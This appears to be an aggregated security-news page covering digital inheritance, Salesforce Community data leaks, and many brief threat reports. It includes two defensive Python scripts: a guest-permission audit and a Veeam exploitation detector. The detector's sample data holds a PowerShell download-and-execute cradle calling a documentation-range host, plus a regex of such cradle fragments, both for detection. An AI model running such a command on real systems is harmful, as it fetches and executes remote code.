Episode 296 kicks off with news that Oasis may be reforming – except not really. Turns out some boffins have figured out how to use A.I. to create new Oasis music. Unsurprisingly, UMG (Universal Music Group) aren't too happy. From A.I. to A.I., the next story looks at the evolution of Google's Bard bot, and following that there's discussion around the U.K. government's decision to build its own supercomputer, with the purpose of, you guessed it, artificial intelligence. To wrap up, the team discuss a story about Twitter's recent problems around verification status. If you liked what you heard, please consider subscribing.
Stories covered: Musicians threaten to make Oasis Live Forever with AI; Google Bard introduces new features for generating and debugging code; gov gathers up £100M for AI super-models; Twitter gives fake Disney account verified status.
That humans are mortal is not news. What is novel, however, is that over the past two decades people have accumulated digital assets that never used to exist. And many of us have probably posed the question at some point: what will happen afterward to all my social media and messenger accounts, all my cloud archives of e-mails and photos, plus domains and websites, not to mention e-wallets and accounts on trading platforms?

Posthumous account

In 2012, the parents of a 15-year-old girl from Berlin tried to log into her Facebook account after their daughter jumped in front of a train. Her parents wanted to find out what had led to her suicide; they suspected cyberbullying. However, the account had already been memorialized and no one could access it. Only after six years (!) of litigation, in 2018, did Germany's highest civil court rule that, when it comes to inheritance, social media accounts are no different from personal letters and diaries; that is, they must be transferred to the legal heirs, in this case the parents.

But why did the process take so long? Because the IT industry doesn't agree with this characterization of digital assets. There are usually two counterarguments. First, Facebook and other services cite personal data protection laws: such data cannot be transferred to third parties without the owner's permission. True, the owner is deceased in this case, but the people they exchanged messages with are still alive and haven't given permission for their correspondence to be read. Second, many digital services provide their products under a license, as a service for temporary use, and the law doesn't provide for the inheritance of such a lease. For example, in some countries domain names are registered on the basis of a service agreement, and services are not included in the will of the deceased.

Rules for digital cemeteries

When inheritance laws don't cover a digital asset, hope lies with the company's policy and the steps taken by the testator before their death. Some domain registrars make it possible to transfer a domain to the next of kin, provided the necessary documents are presented. Other services are also slowly beginning to introduce similar policies.

The latest versions of iOS allow you to designate a legacy contact: a digital successor who will have access to your Apple ID in the event of your death. True, not all of your digital assets will be made available to your chosen heir. In particular, they won't get access to your e-books, movies, music or other purchases made online (recall that a digital book isn't a book, but a temporarily rented service!). For Google accounts, this feature is called Inactive Account Manager. Your designated successor will have access to your data if the account is inactive for a long time (you set the period of inactivity yourself). Facebook has something similar for memorializing accounts. You can inform the company in advance of your posthumous wishes regarding your account: either to have it deleted entirely, or to specify legacy contacts who'll manage your memorialized account, or rather watch over it: they won't be able to change old content, read messages or delete friends, but only change your profile photo, post a memorial, and allow selected friends to write tributes in a special memorial feed. In addition, legacy contacts must have their own Facebook account (yes, the social network never misses an opportunity to boost its user base). All the same, the rules differ from service to service, each with its own peculiarities.

There are already tens of millions of social media accounts that belong to folks no longer with us, and by far not all of them have been memorialized. After all, as in the case of deleting an account, it's necessary to provide the service with documents proving the owner's death (Instagram, LinkedIn and other social networks operate similar rules). But in many cases accounts continue to be maintained by relatives, and sometimes by complete strangers, using the popularity of the deceased for their own purposes. And social networks themselves automatically invite us to congratulate the deceased on their birthdays or inadvertently confront us with painful memories. It's possible that in the virtual metaverses of the future, hordes of the dead will roam the streets on autopilot, like in the worst kind of zombie apocalypse movie.

What to do, while still alive!

Let's recap. There's no one-size-fits-all solution, but we can all individually take care of what happens to our digital assets after we shuffle off this mortal coil.

You might want to make a will with a lawyer, specifying your digital assets and the people who will inherit them. Even if the inheritance law in your country doesn't cover such assets, having a will can help in disputes.

Find out about the legacy policy of each digital service you use, and what needs to be done in the settings or contracts. For example, funds in e-wallets can pass to the rightful heirs without additional measures, as money is covered by inheritance law. But in the case of e-mail, the various types of digital storage, and social networks, it makes sense to set up a legacy contact in the service. To do this, you'll have to read and follow the guidelines of each specific service.

For their part, your heirs will have to figure out what the procedure is for gaining access in each of these services. If you've set up a legacy contact, they'll have to present a certain document or electronic code to gain access, depending on the rules of the service in question. Many services (such as Twitter, Instagram and LinkedIn) don't transfer access to deceased users' accounts to anyone. They may, at the request of relatives, delete or memorialize an account, but even this requires the right documentation. And in certain cases you may need to prove your rights in court.

Kaspersky Global Research & Analysis Team (GReAT) experts Marco Preuss (Deputy Director) and Dan Demeter (Senior Security Researcher), in their Digital Life and Physical Death session at the RSA Conference 2023, raised a number of additional factors for us to consider while alive.

Decide in advance what kind of data you want to bequeath, in what format, and on what media it will be stored. Unfortunately, the lifespan of modern storage media is 5–30 years, so digital archives need to be periodically refreshed and transferred to more modern media. Don't rely too much on cloud storage: how many of those have closed down in the last 10 years?

If your digital storage contains documents in proprietary formats, also take care of the software for opening them. Imagine you have valuable documents in, say, SuperCalc or other outdated formats. Either convert the documents to modern open formats, or attach copies of software that can open them. The same goes for any specialized hardware that may be needed to access your data.

Include a detailed description of everything you've collected, where it's located, and how to use it. Besides a textual description, it's worth adding audio or video recordings which, as well as giving instructions, clearly express your wishes regarding what's to be done with your digital legacy.

Keep passwords, private keys, and other tools for accessing encrypted and private data in a safe, separate place. Important! Don't include passwords or private keys in your will: wills become a matter of public record in certain countries. The most reliable way to store them is in a dedicated digital vault, such as Kaspersky Password Manager, protected with a master password, and to transfer access to this storage to a trusted person along with posthumous instructions (for example, "Delete everything"). The main thing here is to choose the right person. Remember the case of the writer Vladimir Nabokov: he left instructions to destroy the manuscript of his last unfinished novel, but his wife didn't comply, and his son published his father's drafts in Playboy magazine.
A shocking number of organizations — including banks and healthcare providers — are leaking private and sensitive information from their public Salesforce Community websites, KrebsOnSecurity has learned. The data exposures all stem from a misconfiguration in Salesforce Community that allows an unauthenticated user to access records that should only be available after logging in.

[Image caption: A researcher found DC Health had five Salesforce Community sites exposing data.]

Salesforce Community is a widely used cloud-based software product that makes it easy for organizations to quickly create websites. Customers can access a Salesforce Community website in two ways: authenticated access (requiring login), and guest user access (no login required). The guest access feature allows unauthenticated users to view specific content and resources without needing to log in. However, Salesforce administrators sometimes mistakenly grant guest users access to internal resources, which lets unauthorized users reach an organization's private information and can lead to data leaks.

Until being contacted by this reporter on Monday, the state of Vermont had at least five separate Salesforce Community sites that allowed guest access to sensitive data, including a Pandemic Unemployment Assistance program that exposed the applicant's full name, Social Security number, address, phone number, email, and bank account number.

[Image caption: This misconfigured Salesforce Community site from the state of Vermont was leaking pandemic assistance loan application data, including names, SSNs, email address and bank account information.]

Vermont's Chief Information Security Officer Scott Carbee said his security teams have been conducting a full review of their Salesforce Community sites, and already found one additional Salesforce site operated by the state that was also misconfigured to allow guest access to sensitive information. "My team is frustrated by the permissive nature of the platform," Carbee said. Carbee said the vulnerable sites were all created rapidly in response to the Coronavirus pandemic, and were not subjected to their normal security review process.

"During the pandemic, we were largely standing up tons of applications, and let's just say a lot of them didn't have the full benefit of our dev/ops process," Carbee said. "In our case, we didn't have any native Salesforce developers when we had to suddenly stand up all these sites."

Earlier this week, KrebsOnSecurity notified Columbus, Ohio-based Huntington Bank that its recently acquired TCF Bank had a Salesforce Community website that was leaking documents related to commercial loans. The data fields in those loan applications included name, address, full Social Security number, title, federal ID, IP address, average monthly payroll, and loan amount. Huntington Bank has disabled the leaky TCF Bank Salesforce website. Matthew Jennings, deputy chief information security officer at Huntington, said the company was still investigating how the misconfiguration occurred, how long it lasted, and how many records may have been exposed.

KrebsOnSecurity learned of the leaks from security researcher Charan Akiri, who said he wrote a program that identified hundreds of other organizations running misconfigured Salesforce pages. But Akiri said he's been wary of probing too far, and has had difficulty getting responses from most of the organizations he has notified to date. "In January and February 2023, I contacted government organizations and several companies, but I did not receive any response from these organizations," Akiri said. "To address the issue further, I reached out to several CISOs on LinkedIn and Twitter. As a result, five companies eventually fixed the problem. Unfortunately, I did not receive any responses from government organizations."

The problem Akiri has been trying to raise awareness about came to the fore in August 2021, when security researcher Aaron Costello published a blog post explaining how misconfigurations in Salesforce Community sites could be exploited to reveal sensitive data (Costello subsequently published a follow-up post detailing how to lock down Salesforce Community sites).

On Monday, KrebsOnSecurity used Akiri's findings to notify Washington D.C. city administrators that at least five different public DC Health websites were leaking sensitive information. One DC Health Salesforce Community website designed for health professionals seeking to renew licenses with the city leaked documents that included the applicant's full name, address, Social Security number, date of birth, license number and expiration, and more. Akiri said he notified the Washington D.C. government in February about his findings, but received no response. Reached by KrebsOnSecurity, interim Chief Information Security Officer Mike Rupert initially said the District had hired a third party to investigate, and that the third party confirmed the District's IT systems were not vulnerable to data loss from the reported Salesforce configuration issue. But after being presented with a document including the Social Security number of a health professional in D.C. that was downloaded in real time from the DC Health public Salesforce website, Rupert acknowledged his team had overlooked some configuration settings.

Washington, D.C. health administrators are still smarting from a data breach earlier this year at the health insurance exchange DC Health Link, which exposed personal information for more than 56,000 users, including many members of Congress. That data later wound up for sale on a top cybercrime forum. The Associated Press reports that the DC Health Link breach was likewise the result of human error, and said an investigation revealed the cause was a DC Health Link server that was "misconfigured to allow access to the reports on the server without proper authentication."

Salesforce says the data exposures are not the result of a vulnerability inherent to the Salesforce platform, but they can occur when customers' access control permissions are misconfigured. "As previously communicated to all Experience Site and Sites customers, we recommend utilizing the Guest User Access Report Package to assist in reviewing access control permissions for unauthenticated users," reads a Salesforce advisory from Sept. 2022. "Additionally, we suggest reviewing the following Help article, Best Practices and Considerations When Configuring the Guest User Profile."

In a written statement, Salesforce said it is actively focused on data security for organizations with guest users, and that it continues to release "robust tools and guidance for our customers," including:
Guest User Access Report
Control Which Users Experience Cloud Site Users Can See
Best Practices and Considerations When Configuring the Guest User Profile

"We've also continued to update our Guest User security policies, beginning with our Spring '21 release with more to come in Summer '23," the statement reads. "Lastly, we continue to proactively communicate with customers to help them understand the capabilities available to them, and how they can best secure their instance of Salesforce to meet their security, contractual, and regulatory obligations."
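The exposures above come down to one question an administrator can answer from the inside: which objects does the site's guest user profile have read permission on? The script below is an added example written for this page; it is not code from KrebsOnSecurity, Akiri, Costello or Salesforce. It assumes an admin session able to run SOQL through the REST query endpoint; the query text, the field and relationship names (ObjectPermissions, Parent.Profile.UserType = 'Guest'), the sensitive-object list and the sample response are all my own assumptions or constructed data, and should be checked against your org's API version before use.

```python
"""Audit which objects a Salesforce site's guest user profile can read.

Added example, not from the article or from Salesforce. Assumes you run
the SOQL below as an admin via /services/data/vNN.0/query and feed the
JSON response to audit_guest_permissions(). The SOQL shape, the object
names and the sample response are assumptions / constructed data.
"""
import json
import re

# SOQL an admin would run (assumption: standard ObjectPermissions ->
# PermissionSet -> Profile relationship names; verify for your API version).
GUEST_OBJECT_PERMS_SOQL = (
    "SELECT SobjectType, PermissionsRead, PermissionsViewAllRecords, "
    "Parent.Profile.Name, Parent.Profile.UserType "
    "FROM ObjectPermissions WHERE Parent.Profile.UserType = 'Guest'"
)

# Objects that are almost never legitimate for unauthenticated access.
# Heuristic list of my own; extend with the custom objects your sites use.
HIGH_RISK_OBJECTS = {"Contact", "Lead", "Account", "Case", "User", "Opportunity"}
HIGH_RISK_PATTERNS = re.compile(r"(loan|ssn|bank|applicant|licen[cs]e|payroll)", re.I)

# Constructed sample of a query response; NOT data from any real site.
SAMPLE_RESPONSE = json.dumps({
    "totalSize": 4, "done": True,
    "records": [
        {"SobjectType": "Knowledge__kav", "PermissionsRead": True,
         "PermissionsViewAllRecords": False,
         "Parent": {"Profile": {"Name": "Help Center Profile", "UserType": "Guest"}}},
        {"SobjectType": "Contact", "PermissionsRead": True,
         "PermissionsViewAllRecords": True,
         "Parent": {"Profile": {"Name": "Help Center Profile", "UserType": "Guest"}}},
        {"SobjectType": "Loan_Application__c", "PermissionsRead": True,
         "PermissionsViewAllRecords": False,
         "Parent": {"Profile": {"Name": "Assistance Portal Profile", "UserType": "Guest"}}},
        {"SobjectType": "Loan_Application__c", "PermissionsRead": False,
         "PermissionsViewAllRecords": False,
         "Parent": {"Profile": {"Name": "Careers Site Profile", "UserType": "Guest"}}},
    ],
})


def classify(record):
    """Severity for one ObjectPermissions row, or None if it grants no read."""
    if not record.get("PermissionsRead"):
        return None
    obj = record["SobjectType"]
    if obj in HIGH_RISK_OBJECTS or HIGH_RISK_PATTERNS.search(obj):
        # Object read on a sensitive object exposes every record the guest
        # sharing rules reach; "View All Records" bypasses sharing entirely,
        # so every row in the object is reachable without logging in.
        return "critical" if record.get("PermissionsViewAllRecords") else "high"
    return "review"


def audit_guest_permissions(response_json):
    """Parse a query response and return findings, worst first."""
    order = {"critical": 0, "high": 1, "review": 2}
    findings = []
    for rec in json.loads(response_json)["records"]:
        severity = classify(rec)
        if severity is None:
            continue  # no read permission: nothing exposed at object level
        findings.append({
            "profile": rec["Parent"]["Profile"]["Name"],
            "object": rec["SobjectType"],
            "severity": severity,
        })
    return sorted(findings, key=lambda f: (order[f["severity"]], f["object"]))


if __name__ == "__main__":
    for f in audit_guest_permissions(SAMPLE_RESPONSE):
        print(f"{f['severity']:8} {f['profile']:28} {f['object']}")
```

Object-level read is necessary but not sufficient for a leak: which rows a guest can actually fetch is decided by the site's guest sharing rules and by any Apex or flows that run without sharing, so treat a "high" finding as the start of a record-level review, not the end of it. Salesforce's own Guest User Access Report covers this same ground from inside the platform and is the authoritative tool.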
Last year, Google banned 173,000 developer accounts and prevented 1.5 million apps from reaching the Play Store as it fought policy violations and malware.
The lack of understanding around open source poses a threat when legislation is considered. Governments can help by offering funding to remediate vulnerabilities and by supporting open source's long-term development.
Software bugs are ubiquitous, and we're familiar with hardware threats. But what about the gap in the middle? Two researchers at Black Hat Asia will attempt to focus our attention there.
In 2023, there is massive innovation being developed in all sectors, from cybersecurity to AI and quantum computing to IT management and information security, and in all the ways they intersect.
Olympia Community Unit School District 16 - the largest school district in Illinois - realized on February 26, 2023, that it had suffered a ransomware attack, after being targeted by an affiliate of the notorious LockBit ransomware group.
Russian hackers are attempting to inject ransomware into Ukraine's logistics supply chain and those of the Western countries that back Kyiv in its fight against Moscow, a senior National Security Agency official said on Wednesday.
Hackers have stolen email addresses, direct messages, and other personal data from users of two dating websites, according to Troy Hunt, the founder and maintainer of Have I Been Pwned.
While there have been many laudable applications of these technologies in healthcare, education, and even art, it’s essential to understand the broader way in which these technologies could be used and the potential risks they pose.
The company revealed in its "bad apps" yearly report that it also prevented almost 1.5 million apps linked to various policy violations from reaching the Google Play Store.
A Veeam Backup process was seen carrying out a shell command to download and execute a PowerShell script, abusing the Veeam Backup & Replication vulnerability CVE-2023-27532. Further analysis revealed that the script was in fact the Powertrash in-memory dropper, a tool previously used by FIN7. The group then deployed Diceloader, a backdoor also referred to as Lizar.
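The chain above (backup service process, then a shell, then a PowerShell download cradle) is a good candidate for a process-creation detection. The script below is an added example written for this page, not code from the source report or from Veeam; the event fields are a constructed Sysmon-style subset, the parent image name Veeam.Backup.Service.exe is my assumption for the process hosting the vulnerable listener, and the sample events are invented (the URL uses the 198.51.100.0/24 documentation range).

```python
"""Flag a Veeam backup service process spawning a shell that runs a download cradle.

Added example, not from the source report. Event records mimic Sysmon
EventID 1 fields (ParentImage, Image, CommandLine, ProcessId); the parent
process name and the sample events below are assumptions / constructed.
"""
import re

# Assumption: the Veeam service process that would spawn a shell after
# exploitation. Confirm against your deployment's process tree.
VEEAM_PARENTS = {"veeam.backup.service.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Common PowerShell / LOLBin download-and-run fragments (case-insensitive).
CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|frombase64string|-enc(odedcommand)?\s|"
    r"net\.webclient|\bcurl\b|bitsadmin)",
    re.IGNORECASE,
)

# Constructed sample events; not taken from any real incident.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/u.ps1\')"'},
    {"ProcessId": 4188,
     "ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
    {"ProcessId": 5002,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')"},
    {"ProcessId": 5100,
     "ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Program Files\Veeam\Backup and Replication\Backup\VeeamAgent.exe",
     "CommandLine": "VeeamAgent.exe --job 17"},
]


def basename(path):
    """Lower-cased final path component, tolerant of / and \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score(event):
    """Return a severity for one process-creation event, or None.

    critical: Veeam service -> shell whose command line contains a cradle
    medium:   Veeam service -> shell with no cradle (rare; baseline it)
    None:     not a Veeam-service-spawned shell (out of scope for this rule)
    """
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    if parent not in VEEAM_PARENTS or image not in SHELLS:
        return None
    if CRADLE.search(event.get("CommandLine", "")):
        return "critical"
    return "medium"


def detect(events):
    """Return (ProcessId, severity) for every event the rule fires on."""
    alerts = []
    for ev in events:
        severity = score(ev)
        if severity:
            alerts.append((ev["ProcessId"], severity))
    return alerts


if __name__ == "__main__":
    for pid, severity in detect(SAMPLE_EVENTS):
        print(f"pid={pid} severity={severity}")
```

The third sample (a cradle launched from explorer.exe) is deliberately ignored: it may deserve its own rule, but it is not the Veeam exploitation pattern. Before deploying, baseline whether your backup jobs' pre/post scripts legitimately cause the service to spawn cmd.exe or powershell.exe; if they do, the "medium" tier will need an allow-list of known script paths.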
According to a study by MyCena Security Solutions, there is an opportunity for businesses to learn how to eradicate password resets from their processes to improve both their security and bottom line.
South Korean education, construction, diplomatic, and political institutions are at the receiving end of new attacks perpetrated by a China-aligned threat actor known as the Tonto Team.
A school in Wiltshire was hit by a ransomware attack last weekend. Hardenhuish School, a mixed secondary academy in Chippenham, sent texts to parents and guardians of its 1,623 pupils notifying them of the attack.
A ransomware attack has been reported in Spartanburg County. WYFF News 4 reached out to Spartanburg County officials and the South Carolina Judicial Branch after hearing about a possible computer issue.
Taiwanese network equipment manufacturer Zyxel this week announced patches for a critical-severity vulnerability impacting its ATP, USG FLEX, VPN, and ZyWALL/USG firewalls.
A senior Department of Homeland Security official confirmed Wednesday that DHS is working with Congress and the White House on a bill that would codify the Cyber Safety Review Board (CSRB) — a new effort to examine major cybersecurity incidents.
The latest iteration, as observed by Malwarebytes on a Parisian travel accessory store running on the PrestaShop CMS, involved the injection of a skimmer called Kritec to intercept the checkout process and display a fake payment dialog to victims.
A 36-year-old Ukrainian citizen was arrested this week for allegedly selling the personal data of over 300 million people to Russia, the Ukrainian cyber police said in a statement.
Unit 42 discovered a new Linux variant of the PingPull malware, used by Alloy Taurus (aka Gallium) to target Linux systems. It is an ELF file that only 3 of 62 antivirus vendors flagged as malicious. During the investigation, the threat actor's infrastructure also revealed evidence of another backdoor used in the attacks, known as Sword2033.
Trend Micro uncovered a new risk to Docker containers from a piece of malware called TrafficStealer. It manipulates web traffic and ad interaction, using containers to generate illicit income. TrafficStealer uses a combination of two techniques: web crawling and click simulation. Experts recommend implementing zero-trust security for all container environments and auditing for any unwanted exposed container APIs.
The potential of generative AI in cybersecurity tooling has sparked excitement among cybersecurity professionals. However, there are concerns about the practical usage of AI in cybersecurity and the reliability of training data used in AI models.
The websites of major Israeli news outlet Maariv, sister publication of The Jerusalem Post, were taken offline on Wednesday. The Anonymous Sudan group also managed to take down the website of the Israel Ports Authority and the Meretz political party.
The latest cyberattack techniques highlighted by a range of experts during the RSA 2023 Conference include SEO-based attacks, targeting of developers, malicious use of ChatGPT, and more.
Private Telegram channels are being abused by cybercriminals to sell a new macOS malware variant that can steal data from over 50 cryptocurrency browser extensions. Dubbed Atomic, the malware is sold with a ready-to-use web panel for easy victim management, a cryptocurrency checker, a MetaMask brute-forcer, a DMG installer, and the ability to receive stolen logs on Telegram.
In March and April 2023, Trend Micro researchers observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind.
The US government is notifying healthcare providers and lab personnel about a component used by several Illumina medical devices being affected by serious vulnerabilities that can allow remote hacking.
Ubuntu Security Notice 6046-1 - It was discovered that OpenSSL-ibmca incorrectly handled certain RSA decryption operations. An attacker could possibly use this issue to expose sensitive information.
Ubuntu Security Notice 6047-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges. Please note that with the fix for this CVE, kernel support for the TCINDEX classifier has been removed.
Xage CEO Duncan Greatwood joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss identity and access management in the context of critical infrastructure.
Terence Liu and Jeff DePasse of TXOne Networks join Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss operational technology, critical infrastructure, and the National Cybersecurity Strategy.
Mandiant's Charles Carmakal joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss the company's latest annual M-Trends report.
Beyond Identity's Patrick McBride joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss the challenges and shortcomings of current authentication technologies.
Dave Frampton of Sumo Logic Security joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss how automation falls short in security management.
John Shier of Sophos joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss the latest active adversary reports.
Invicti's Patrick Vandenberg joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss the latest global threat report.
Lookout CEO Jim Dolce joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss remote work and the expanding attack surface.
Rick McElroy of VMware joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss lateral movement and cloud operations.
Delilah Schwartz of Cybersixgill joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss the cybercrime underground.
Teresa Lanowitz of AT&T Business joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss edge computing and security threats at the edge.
Brendan O'Connor of AppOmni joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss how to secure software-as-a-service (SaaS) applications.
Brad Rinklin and Renée Burton of Infoblox join Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss DNS networking and security.
Mike Nichols of Elastic Security joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss extended detection and response (XDR) and endpoint detection and response (EDR).
JupiterOne founder Erkang Zheng joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss securing assets and attack surface management.
Arabella Hallawell, CMO with Mend, joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss securing assets and attack surface management.
Expel's Dave Merkel joins Dark Reading's Terry Sweeney at Dark Reading News Desk during RSA Conference to discuss how there needs to be tighter integration between systems and applications.
An ongoing Magecart campaign has attracted the attention of cybersecurity researchers for leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users. "The threat actor used original logos from the compromised store and customized a web element known as a modal to perfectly hijack the checkout page," Jérôme Segura, director of threat intelligence at
South Korean education, construction, diplomatic, and political institutions are at the receiving end of new attacks perpetrated by a China-aligned threat actor known as the Tonto Team. "Recent cases have revealed that the group is using a file related to anti-malware products to ultimately execute their malicious attacks," the AhnLab Security Emergency Response Center (ASEC) said in a report
Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer. "The Atomic macOS Stealer can steal various types of information from the victim's machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and
Stopping new and evasive threats is one of the greatest challenges in cybersecurity. This is among the biggest reasons why attacks increased dramatically in the past year yet again, despite the estimated $172 billion spent on global cybersecurity in 2022. Armed with cloud-based tools and backed by sophisticated affiliate networks, threat actors can develop new and evasive malware more quickly
Networking equipment maker Zyxel has released patches for a critical security flaw in its firewall devices that could be exploited to achieve remote code execution on affected systems. The issue, tracked as CVE-2023-28771, is rated 9.8 on the CVSS scoring system. Researchers from TRAPA Security have been credited with reporting the flaw. "Improper error message handling in some firewall versions
A significant number of victims in the consumer and enterprise sectors located across Australia, Japan, the U.S., and India have been affected by an evasive information-stealing malware called ViperSoftX. ViperSoftX was first documented in 2020, with cybersecurity company Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension
Boffins at McAfee have identified 38 Android apps in the Google Play store that unashamedly rip off the ever-popular gaming sensation Minecraft, but are actually designed to stealthily earn advertising revenue.